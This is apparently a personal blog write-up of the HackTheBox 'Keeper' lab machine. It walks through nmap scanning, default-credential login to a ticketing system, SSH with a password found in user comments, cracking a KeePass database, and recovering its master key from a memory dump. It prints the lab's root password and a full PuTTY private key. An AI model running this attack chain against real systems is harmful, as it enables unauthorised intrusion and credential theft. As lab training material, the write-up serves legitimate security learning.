Post

HackTheBox Keeper Writeup

Posted
By wzwr1029 6 min read

Nmap Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

# Nmap 7.95 scan initiated Mon Jun 16 13:01:35 2025 as: /usr/lib/nmap/nmap -sC -sV -vv -oN nmap 10.10.11.227
Nmap scan report for 10.10.11.227
Host is up, received echo-reply ttl 63 (0.053s latency).
Scanned at 2025-06-16 13:01:37 GMT for 9s
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKHZRUyrg9VQfKeHHT6CZwCwu9YkJosNSLvDmPM9EC0iMgHj7URNWV3LjJ00gWvduIq7MfXOxzbfPAqvm2ahzTc=
|   256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBe5w35/5klFq1zo5vISwwbYSVy1Zzy+K9ZCt0px+goO
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun 16 13:01:46 2025 -- 1 IP address (1 host up) scanned in 11.01 seconds

HTTP Port 80 Enumeration

Seems like we might need to add the domain into /etc/hosts, by adding it, we can view the services:

By searching the default credentials https://forum.bestpractical.com/t/default-password/20088/2, we can try root:password to login!

Then, we can search for authenticated exploit, we lead us to found https://www.exploit-db.com/exploits/38459. In summary, there is SQL injection at the endpoint Approvals. However, after some testing, it failed due to protection of Cross-Site-Scripting (Don’t know why this happend)

Back to enumeration…

Since we are manager of the web services, we can try to search another users. In the options of Admin -> Users, we can found existing user in the services:

By clicking inorgaard, we can found the information of him. Luckily, in the comments about this user section, we knows the initial password is set to Welcome2023!, we may try to use this as password to login as inorgaard:Welcome2023!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

┌──(wzwr㉿kali)-[~/htb/keeper]
└─$ ssh lnorgaard@keeper.htb
The authenticity of host 'keeper.htb (10.10.11.227)' can't be established.
ED25519 key fingerprint is SHA256:hczMXffNW5M3qOppqsTCzstpLKxrvdBjFYoJXJGpr7w.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:6: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes 
Warning: Permanently added 'keeper.htb' (ED25519) to the list of known hosts.
lnorgaard@keeper.htb's password: 
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
You have mail.
Last login: Tue Aug  8 11:31:22 2023 from 10.10.14.23
lnorgaard@keeper:~$

Good!

Post-Exploitation

Quick-Check

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

lnorgaard@keeper:~$ id
uid=1000(lnorgaard) gid=1000(lnorgaard) groups=1000(lnorgaard)
lnorgaard@keeper:~$ sudo -l
[sudo] password for lnorgaard: 
Sorry, user lnorgaard may not run sudo on keeper.
lnorgaard@keeper:~$ ls -la
total 85380
drwxr-xr-x 4 lnorgaard lnorgaard     4096 Jul 25  2023 .
drwxr-xr-x 3 root      root          4096 May 24  2023 ..
lrwxrwxrwx 1 root      root             9 May 24  2023 .bash_history -> /dev/null
-rw-r--r-- 1 lnorgaard lnorgaard      220 May 23  2023 .bash_logout
-rw-r--r-- 1 lnorgaard lnorgaard     3771 May 23  2023 .bashrc
drwx------ 2 lnorgaard lnorgaard     4096 May 24  2023 .cache
-rw------- 1 lnorgaard lnorgaard      807 May 23  2023 .profile
-rw-r--r-- 1 root      root      87391651 Jun 16 06:58 RT30000.zip
drwx------ 2 lnorgaard lnorgaard     4096 Jul 24  2023 .ssh
-rw-r----- 1 root      lnorgaard       33 Jun 16 06:42 user.txt
-rw-r--r-- 1 root      root            39 Jul 20  2023 .vimrc
lnorgaard@keeper:~$ ```


There is a suspicious file named **RT30000.zip**, we may download it and try to investigate what insides.

```bash
┌──(wzwr㉿kali)-[~/htb/keeper]
└─$ zipinfo -1 RT30000.zip 
KeePassDumpFull.dmp
passcodes.kdbx

which contains the keepass database and a crash dump report?

Low-Fruit Hanging

We can try to brute force the database first to see whether we are able to crack the password.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

┌──(wzwr㉿kali)-[~/htb/keeper]
└─$ keepass2john passcodes.kdbx > passcodes.hash

┌──(wzwr㉿kali)-[~/htb/keeper]
└─$ john --format=keepass passcodes.hash 
Created directory: /home/wzwr/.john
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
0g 0:00:00:14 1.67% 2/3 (ETA: 13:41:19) 0g/s 292.8p/s 292.8c/s 292.8C/s fiction..jethrotull
0g 0:00:00:52 9.11% 2/3 (ETA: 13:36:49) 0g/s 277.6p/s 277.6c/s 277.6C/s Europe1..Marty1

Failed

KeePassDumpFull?

By searching KeePassDump, we found

Seems like it is a CVE that pwn keepass and able to leak master key, let’s try the exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

┌──(wzwr㉿kali)-[~/htb/keeper/keepass-password-dumper]
└─$ dotnet run /home/wzwr/htb/keeper/KeePassDumpFull.dmp

...

Password candidates (character positions):
Unknown characters are displayed as "●"
1.: ●
2.: ø, Ï, ,, l, `, -, ', ], §, A, I, :, =, _, c, M, 
3.: d, 
4.: g, 
5.: r, 
6.: ø, 
7.: d, 
8.:  , 
9.: m, 
10.: e, 
11.: d, 
12.:  , 
13.: f, 
14.: l, 
15.: ø, 
16.: d, 
17.: e, 
Combined: ●{ø, Ï, ,, l, `, -, ', ], §, A, I, :, =, _, c, M}dgrød med fløde

The password seems to be dgrød med fløde, we can try to use this as master key:

1
2
3
4
5
6
7

┌──(wzwr㉿kali)-[~/htb/keeper]
└─$ kpcli --kdb=passcodes.kdbx
Provide the master password: *************************
Couldn't load the file passcodes.kdbx

Error(s) from File::KeePass:
The database key appears invalid or else the database is corrupt.

seems like not correct, it might be the password is not shown correctly, we may guess by googling:

Let’s try to use rødgrød med fløde as password:

1
2
3
4
5
6
7
8
9

┌──(wzwr㉿kali)-[~/htb/keeper]
└─$ kpcli --kdb=passcodes.kdbx
Provide the master password: *************************

KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/>

Good!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

kpcli:/passcodes/Network> ls
=== Entries ===
0. keeper.htb (Ticketing Server)                                          
1. Ticketing System                                                       
kpcli:/passcodes/Network> show 0 -f

Title: keeper.htb (Ticketing Server)
Uname: root
 Pass: F4><3K0nd!
  URL: 
Notes: PuTTY-User-Key-File-3: ssh-rsa
       Encryption: none
       Comment: rsa-key-20230519
       Public-Lines: 6
       AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
       8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
       EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
       Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
       FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
       LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
       Private-Lines: 14
       AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6j
       oDni1wZdo7hTpJ5ZjdmzwxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCih
       kmyZTZOV9eq1D6P1uB6AXSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputY
       f7n24kvL0WlBQThsiLkKcz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzT
       VkCew1DZuYnYOGQxHYW6WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivz
       UXjcCAviPpmSXB19UG8JlTpgORyhAAAAgQD2kfhSA+/ASrc04ZIVagCge1Qq8iWs
       OxG8eoCMW8DhhbvL6YKAfEvj3xeahXexlVwUOcDXO7Ti0QSV2sUw7E71cvl/ExGz
       in6qyp3R4yAaV7PiMtLTgBkqs4AA3rcJZpJb01AZB8TBK91QIZGOswi3/uYrIZ1r
       SsGN1FbK/meH9QAAAIEArbz8aWansqPtE+6Ye8Nq3G2R1PYhp5yXpxiE89L87NIV
       09ygQ7Aec+C24TOykiwyPaOBlmMe+Nyaxss/gc7o9TnHNPFJ5iRyiXagT4E2WEEa
       xHhv1PDdSrE8tB9V8ox1kxBrxAvYIZgceHRFrwPrF823PeNWLC2BNwEId0G76VkA
       AACAVWJoksugJOovtA27Bamd7NRPvIa4dsMaQeXckVh19/TF8oZMDuJoiGyq6faD
       AF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGy
       NNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is=
       Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0

Its look like a PuTTY-User-Key-File, we copy the notes section into a file. Then, we use puttygen to generate rsa key

1
2

┌──(wzwr㉿kali)-[~/htb/keeper]
└─$ puttygen ssh_key -O private-openssh -o id_rsa

Then we use this private key to ssh:

1
2
3
4
5
6
7
8
9
10
11
12

┌──(wzwr㉿kali)-[~/htb/keeper]
└─$ ssh root@keeper.htb -i id_rsa 
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

You have new mail.
Last login: Tue Aug  8 19:00:06 2023 from 10.10.14.41
root@keeper:~#
cybersecurity, ctf, htb
pentest cybersecurity ctf htb
This post is licensed under CC BY 4.0 by the author.